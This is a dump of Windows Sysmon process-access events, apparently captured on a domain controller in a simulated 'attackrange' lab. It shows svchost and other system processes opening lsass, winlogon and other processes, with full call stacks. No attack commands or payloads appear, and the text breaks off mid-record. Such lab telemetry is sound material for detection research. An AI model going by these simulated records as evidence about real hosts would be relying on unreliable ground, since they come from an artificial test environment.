13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\S
ystem32\KERNEL32.DLL+84d4 10341000x800000000000000010012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+37c3|c:\windows\system32\SYSNTFY.dll+1dcb|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.196{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.164{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.039{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-ED04-00000000A301}3532C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\nt